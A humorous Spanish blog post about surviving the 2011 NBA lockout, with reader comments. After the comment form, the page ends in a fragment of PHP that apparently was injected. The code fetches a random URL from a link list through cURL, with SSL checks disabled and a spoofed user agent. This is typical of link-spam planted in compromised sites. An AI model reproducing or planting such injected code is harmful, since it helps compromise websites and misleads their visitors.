Reflexiones sobre la bocina #7 Manual de supervivencia al lockout

13 de September de 2011 por MagicJohnson32

Tal vez el lector no sea consciente de a qué nos enfrentamos. Es posible que, entre unas cosas y otras, no se haya percatado de la gravedad de la situación. Puede que haya estado distraído durante el verano, dejando que sus neuronas se calcinasen bajo el abrasador sol de Torrevieja, y estos días mantenga su atención en el Eurobasket y el Preolímpico americano. De ser así, me disculpo ante lo que constituiría un acto de enorme crueldad. Porque, señores, lamento comunicarles que nos enfrentamos a un año, tal vez más, sin NBA.

Es cierto: no hace tanto ya vivimos un lockout. El último cierre patronal mutiló severamente la inefable temporada 98-99, la del asterisco, que se limitó a una regular season de 50 partidos (aunque no todo fue malo: aquel año nos ahorramos el All Star Weekend). Pero aquello fue antes de las retransmisiones diarias por televisión, antes de que Internet nos permitiese ver cualquier partido en directo o en diferido, antes del league pass; antes, en definitiva, de que se nos diese la oportunidad de entregar nuestros días y nuestras noches a la NBA.

La pregunta, por tanto, es “¿qué será de nosotros si el lockout se prolonga hasta obligar a suspender la temporada?”. Por ello, las Reflexiones sobre la bocina regresan con una serie de recomendaciones para hacerlo tan llevadero como sea posible.

Lockout: Manual de Supervivencia

boza

- "A Nash lo iba a tener yo haciendo flexiones hasta que me pase los bloqueos por delante"

Regla #1 – Cambie de mentalidad. Convénzase de que en el baloncesto no gana el que anota más sino el que encaja menos puntos. Repita conmigo: “La NBA está sobrevalorada; lo que molaba de verdad era el Limoges de Maljkovic”.

Regla #2 – Cambie de ídolos. Kobe Bryant es un chupón; LeBron siempre hace pasos; Wade no sabe tirar; Deron Williams se cargó a Sloan; Chris Paul tiene dos nombres y ningún apellido; Tim Duncan es un soso… Sean cuales sean sus ídolos, acháqueles algún defecto, sin importar si es cierto o no. Y no se preocupe si el baloncesto FIBA no le alcanza para alimentar su mitomanía. Vivimos unos tiempos en los que si algo no falta son estrellas: futbolistas, actores, ex concursantes de reality, ex actores de Disney metidos a cantantes, cantantes metidos a ONG’s andantes… Hay donde elegir.

Regla #3 – Cambie de hábitos. Piense en algo que hacer en ese tiempo que dedicaba cada mañana, religiosamente, a repasar los box scores de la madrugada anterior. Haga los crucigramas de los periódicos, contabilice las veces que insultan a Rubalcaba en Intereconomía o incluso, plantéese  la posibilidad de cerrar el navegador y ponerse a trabajar.

- "¿Un... lock... out? ¡¡Justo... ahora... que... estaba... cogiendo... la forma!!"

Regla #4 – Cambie su memoria. Priorice los malos recuerdos asociados a la NBA. Trate de bloquear las noches de gloria, los buzzer beaters, las canastas imposibles de Dirk o Kobe, las asistencias magistrales de Nash y Kidd… Asocie la NBA a cosas tan perturbadoras como la selección de tiro de Gordan Giricek, la ética de trabajo de Eddy Curry o los fundamentos ofensivos de Ron Artest, lo que sea necesario para que se le quiten las ganas. (Personalmente, me será de gran ayuda pensar que no tendré que aguantar los comentarios de Loncar.)

Regla #5 – Cambie de afición. ¿Es usted un fanático de los Lakers? ¿De los Celtics? ¿Se ha subido al carro de los Heat? ¿O simplemente anima a los equipos en los que jueguen españoles? Eso se ha acabado. Regale sus camisetas, arranque los pósters de sus paredes, queme los DVD’s… No deje ni rastro, que ni todos los CSI de la tele sean capaces de encontrar prueba alguna de que hubo un tiempo en el que seguía la NBA.

Regla #6 – Cambie de sensibilidad. Aprenda a apreciar las pequeñas cosas, a desentrañar la belleza que encierra lo que hasta ahora le parecía rutinario. Disfrute del canto de un pájaro, de la danza que las copas de los árboles bailan al ritmo que silba la brisa otoñal. Dé largos paseos al amanecer. Escriba poesía. Algo como…

siento que te estoy perdiendo

- "Siento que te estoy perdiendo"

Oh, amor mío, yo te necesito a ti

Como Kenyon Martin a Jason Kidd

Como Artest a su psiquiatra

Como Eddy Curry al Burger King.


Pero, amor mío, siento que te escapas

Que te pierdo de golpe

Como a Brook Lopez le pasa

En las luchas por el rebote.”


De acuerdo, tal vez la poesía no sea la solución…

Regla #7 – Cambie de canal. Es hora de redescubrir la programación televisiva de madrugada. La teletienda le abrirá todo un universo de posibilidades. Actores fracasados tratarán de convencerle de que su existencia sólo encontrará sentido cuando se halle en posesión de un absurdamente extenso juego de cuchillos japoneses, tan afilados que hacen  que el metal tenga la consistencia de una defensa zonal de los Warriors. Las reposiciones de Ley y Orden, teleconcursos, el tarot y otros programas sólo para adultos completan la diversa oferta televisiva nocturna.

Regla #8 – Cambie de lecturas. No más ESPN, RealGM, HoopsHype, NBA.com… No vuelva a entrar, bajo ningún concepto, en este blog. De hecho, salga ahora mismo de aquí, deje de leer y visite la web de cualquiera de los diarios españoles. A partir de ahora, éstos serán su única fuente de información. Ya verá cómo le parecerá que la NBA jamás ha existido.

Regla #9 – Cambie su vocabulario. La NBA, ni mentarla. Si alguien le pregunta por la NBA, hágase el despistado, como si no tuviese la más mínima idea del tema. ¿Sabe la sensación que da Loncar cuando habla? Pues eso.

nbajam99

- Un vídeo-juego con Van Horn en la portada. Me pregunto cómo pudo fracasar...

Regla #10 – Cambie todo lo dicho en las 9 primeras reglas. Si visita este blog con cierta regularidad y ha hecho el esfuerzo de leer hasta aquí es porque realmente ama la NBA. En ese caso, asúmalo: lo suyo no tiene remedio. No haga caso de todo lo dicho anteriormente y aproveche el lockout para ver partidos históricos y aprender un poco de historia de la liga. A los más jóvenes tal vez les sorprenda descubrir que hubo un tiempo en el que Shaquille O’Neal pesaba menos de 150 kilos y las revistas hacían comparativas entre Tim Duncan y un tal Keith Van Horn. Hubo un tiempo en el que Vancouver tenía equipo NBA y los Wizards no eran los Wizards sino los Bullets. Hubo un tiempo en el que Grant Hill era capaz de saltar. Por haber, incluso hubo un tiempo en el que los Warriors firmaban mejores temporadas que los Spurs.

Para cerrar, y si algo he aprendido en la última década, es que cuando el devenir del partido queda en manos de Derek Fisher muy probablemente acabe con victoria sobre la bocina. Mantengamos la fe.

Comenta

14 comentarios a esta entrada

  1. Txusma dice:
    #1

    Ay! Que bien sienta reirse a carcajada limpia un rato!!

      Citar

  2. safd dice:
    #2

    Buenisimo!!!!!!! Me he partio el culo con la regla numero 8, tremendo el articulo xd

    Joer hay q ser optimistas, q el final puede estar cerca, Fisher dijo a los jugadores por sms q estuviesen en forma.

    Con el dinero q se maneja, sabiendo q la fecha limite para q todo vaya nromal es el 15 de septiembre, esto acaba pronto chicos!!!!

    Q se acabe YA!

      Citar

  3. TheDeerHunter dice:
    #3

    Jajjajajaaa

    Ahí le has dado. In Dereck Fisher we trust.

    La carátula de Van Horn es algo que creía podía ser producto de algún tipo de pesadilla con fabada antes de irme a dormir.

    Desconocía esa faceta de poeta tuya…

      Citar

  4. HisRoyalAirness dice:
    #4

    Qué ENORMIDAD!

    Esto sí que es “showtime”, Magic jajaja

    Dicho esto, reconozco que si no hay liga me plantearía cortarme las vena

      Citar

  5. Nacho dice:
    #5

    Magic, yo he tenido un lockout en casa que no se si estoy resolviendo bien, no tendrás manuales para estos casos.
    Coincido con HisRoyalAirness, enorme.

      Citar

  6. Sempren dice:
    #6

    Brutal xDDDDDD El artículo, los pies de foto, el poema… joder! xD
    Por cierto, yo creo que Curry sí puede estar cogiendo la forma… la redonda, en concreto xD

      Citar

  7. Jose_Dantley dice:
    #7

    Showtime, jaja. Eso sí, Magic, pedazo de rojo que eres, jaja

      Citar

  8. Toni dice:
    #8

    Muy grande, si señor. El poema para enmarcar eeee, increible. jajajajaja

      Citar

  9. Grego dice:
    #9

    Muy bueno!!! Jajaja,me ha encantado!! Vamos a rezar para q el ultimo gran tiro de Fish entre sobre la bocina.
    Enhorabuena crack!!

      Citar

  10. Blade Petrovic dice:
    #10

    Pedazo articculo de la risa no puedo ni escribir bien.Grande MAGIC!

      Citar

  11. Alex Espinosa dice:
    #11

    Hola, yo queria comentar que tengo la aplicacion descargada en el movil y es un lujo poder leer las entradas asi d facil. Haces un gran trabajo y son muy interesantes los articulos. Por ultimo me gustaria proponerte una lista de partidos que son obligatorios de ver para un gran aficionado al baloncesto, de todas las epocas de la NBA. Gracias y seguid asi.

      Citar

  12. Txusma dice:
    #12

    “Hacemos” un gran trabajo. Somos un equipo y cualquiera está invitado a participar tanto con sus comentarios como sus artículos. Hace nada Germán se incorporó para explicarnos qué pasaba en el Preolímpìco Americano de Mar del Plata.

    Y recogemos el guante de la sugerencia. Nos ponemos a ello.

    saludos!

      Citar

  13. Blade Petrovic dice:
    #13

    Lo del trivial va a seguir,porque con el empeño que puse para hacerlo no se va a acabar a la cuarta pregunta

      Citar

  14. Txusma dice:
    #14

    Seguirá pero a su debido tiempo. Estamos en pretemporada!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>